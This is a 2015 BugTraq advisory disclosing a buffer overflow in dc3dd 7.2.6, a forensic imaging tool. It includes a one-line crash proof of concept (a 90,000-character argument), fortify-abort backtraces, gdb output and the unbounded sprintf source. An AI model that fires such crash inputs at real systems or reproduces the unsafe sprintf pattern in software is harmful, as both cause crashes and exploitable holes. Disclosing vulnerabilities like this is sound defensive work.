BugTraq
US DoD's Dc3dd v7.2.6 suffers from a Buffer Overflow vulnerability - Advanced Information Security Corporation - Zero Day Research Oct 14 2015 03:15PM
Nicholas Lemonias. (lem nikolas googlemail com)
========================================
DC3DD v.7.2.6 (LATEST) Security Report
========================================
a888b.
d888888b.
8P"YP"Y88
8|o||o|88
8' - .88
8`._.' Y8.
d/ `8b.
dP . Y8b.
d8:' " `::88b
d8" 'Y88b
:8P ' :888
8a. : _a88P
._/"Yaa_: .| 88P|
\ YP" `| 8P `.
/ \.___.d| .'
`--..__)888P`._.'
~ Keeping Things Simple!
===========================================================
Advanced Information Security Corporation
Security Advisory
Date: 14/10/2015
Credit: Nicholas Lemonias
============================================================
Software: DC3DD v.7.2.6
-----------------------
Vendor: US Department of Defense, DC3 Cybercrime Center & Air Force
Office of Special Investigations - http://www.DC3.mil
=========================
Vulnerability:
=========================
(1) Buffer Overflow Vulnerability / ~ Deprecated & Insecure Function
use (Missing Bounds-checks)

Software Overview:
The DC3DD software is a patched version of the GNU version of the
popular UNIX imaging tool â??ddâ?? , with
additional functionality, for use by forensic investigations experts.
DC3DD is a popular package default to a number of popular Linux
distributions. DC3DD was developed at the US Department
of Defense, DC3 in February, 2008 and authored by Jesse Kornblum.
==================
TECHNICAL DETAILS
==================
i. Proof of concept
root@kali:# dc3dd `perl -e 'print "A" x 90000'`
dc3dd 7.2.641 started at 2015-10-13 22:15:26 +0000 compiled options:
*** buffer overflow detected ***: dc3dd terminated
======== Backtrace: ========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)(0xb761a6f3)
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)(0xb76a82d5]

/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xf8380[0xb76a638al
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xf7ae8)(0xb76a5ae8)
/lib/i386-linux-gnu/i686/cmov/libc.so.6(_IO_default_xsputn+0x8e)(0xb761e
04e]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(_IO_vfprintf+0x224a)(0xb75f345a]

/lib/i386-linux-gnu/i686/cmov/libc.so.6(__vsprintf_chk+0xb4)(0xb76a5ba4]

/lib/i386-linux-gnu/i686/cmov/libc.so.6(__sprintf chk+0x2f)[0xb76a5acf]
dc3dd(main+0x49f)(0xb77bbf8f)
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)(0xb75c7a
63]
dc3dd(+0x4968)[0xb77be968]
======== Memory map: ========
b7400000-b741c000 r-xp 00000000 00:13 15866 /lib/1386-linux-gnu/libgcc_s.so.1
b741c000-b741d000 rw-p 0001b000 00:13 15866 /lib/1386-linux-gnu/libgcc_smso.1
b743d000-b747c000 r--p 00000000 00:13 15130
/usr/lib/locale/zu_ZA.utf8/LC_CTYPE
b747c000-b75ac000 r--p 00000000 00:13 15151
/usr/lib/locale/zu_ZA.utf8/LC_COLLATE
b75ac000-b75ae000 rw-p 00000000 00:00 0
b75ae000-b7752000 r-xp 00000000 00:13 1673
/lib/i386-linux-gnu/1686/cmov/libc-2.1 9.so
b7752000-b7754000 r--p 001a4000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1 9.so
b7754000-b7755000 rw-p 001a6000 00:13 1673
/1113/1386-linux-gnu/i686/cmov/libc-2.1
===================
TECHNICAL SYNOPSIS
===================
(gdb) bt
#0 0xbUdebt0 in __kernel_vsyscall ()
#1 0xb7e22307 in GI raise (sig=sig@entry=6)
at ../nptl/sysdeps7unix/sysv/linux/raise.c:56
#2 0xb7e239c3 in GI abort () at abort.c:89
#3 0xb7e606f8 in --liEc message (do_abort=do abort@entry=2,
fmt=fmt@entry=0xb7f53e55 "*** %s ***: %s terminated\n")
at ../sysdeps/posix/libc fatal.c:175
#4 0xb7eee2d5 in GI fortify_fail
msg=msg@entry=0xb7f53dd6 "buffer overflow detected") at fortify_fail.c:31
#5 0xb7eec38a in GI chk fail () at chk fail.c:28
#6 Oxb7eebae8 in _IO str chR overflow (fp=(xbfffbf00, c=65) at
vsprintf_chk.c:33
#7 0xb7e6404e in GI 15 default xsputn (f=0xbfffbf00, data=0x800336e0, n=9015)
at genops.c:480
#8 0xb7e3945a in IO_vfprintf internal (s=s@entry=0xbfffbf00,
format=<optimiied out>, format@entry=0x80025418 "command line:
%s\n",
ap=0xbfffc004 "\0307\002\200\005",
ap@entry=0xbfffc000 "\340\066\003\200\030T\002\200\005") at vfprintf.c:1642
#9 0xb7eebba4 in vsprintf_chk
s=s@entry=0xbfffc010 "command line: /usr/bin/dc3dd ", 'A' <repeats 171
times>...,
flags=flags@entry=1, slen=slen@entry=4096,
format=format@entrr3x80025418 "command line: gss\n",
args=args@entry=0xbfffc000 "\340\066\003\200\030T\002\200\005")
at vsprintf_chk.c:85
#10 0xb7eebacf in ____sprintf_chk
s=0xbfffc010 "command line: /usr/bin/dc3dd ", 'A' <repeats 171 times>...,
#11 0x80001f8f in ?? ()
---Type <return> to continue, or q <return> to quit---
#12 0xb7e0da63 in __libc_start_main (main=0x2, argc=-2147464825, argv=0x0,
init=0x800049b8, fini=0x80001af0, rtld_fini=0x2, stack_end=0xbfffd1d4)
at libc-start.c:287
#13 0x8002ee64 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb)
Program received signal SIGABRT, Aborted.
0xb7fdebe0 in __kernel_vsyscall:
(gdb) disas
Dump of assembler code for function __kernel_vsyscall:
0xb7fdebd0 <+0>: push %ecx
0xb7fdebdl <+1>: push %edx
0xb7fdebd2 <+2>: push %ebp
0xb7fdebd3 <+3>: mov %esp,%ebp
0xb7fdebd5 <+5>: syscenter
0xb7fdebd7 <+7>: nop
0xb7fdebd8 <+8>: nop
0xb7fdebd9 <+9>: nop
0xb7fdebda <+10>: nop
0xb7fdebdb <+11>: nop
0xb7fdebdc <+12>: nop
0xb7fdebdd <+13>: nop
0xb7fdebde <+14>: int $0x80
=> 0xb7fdebe0 <+16>: pop %ebp
0xb7fdebel <+17>: pop %edx
0xb7fdebe2 <+18>: pop %ecx
0xb7fdebe3 <+19>: ret
End of assembler dump.
(gdb)
Permission Set
==============
root@kali:~# ls -al /usr/bin/dc3dd
-rwxr-xr-x 1 root root 189940 Oct 9 2014 /usr/bin/dc3dd
Description:
The permission set illustrates that the software is owned by the
superuser, however executable by all users.
==============
SOURCE CODE
==============
---[../dc3dd/dc3dd.c:4375]-----
static void
report_command_line(int argc, char* const* argv)
{
// Report compiled-in options.
fputs(_("compiled options:"), stderr);
report_compile_flags(stderr, false);
for (log_t* log = job_logs; log; log = log->next_log) {
fputs(_("compiled options:"), log->file);
report_compile_flags(log->file, false);
}
for (log_t* log = hash_logs; log; log = log->next_log) {
fputs(_("compiled options:"), log->file);
report_compile_flags(log->file, false);
}
// Report the command line.
char* command_line = make_cmd_line_string(argc, argv);
char message[DISPLAY_MESSAGE_LENGTH];
sprintf(message, _("command line: %s\n"), command_line);
report(message, ALL_LOGS);
free(command_line);
flush_logs();
}
=============
EXPLANATION
=============
Unsafe use of the sprintf() function, has been triggered which can
facilitate a buffer overflow condition.
Therefore, in the aforementioned experiment a char* type is written
onto a fixed length destination buffer;
No manual bounds checks are provided, to ensure that user-input does
not exceed in size, and therefore
would not overwrite the destination buffer.
----------------------------------
Advanced Information Security © 2015 All rights reserved
Keeping Things Simple!

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus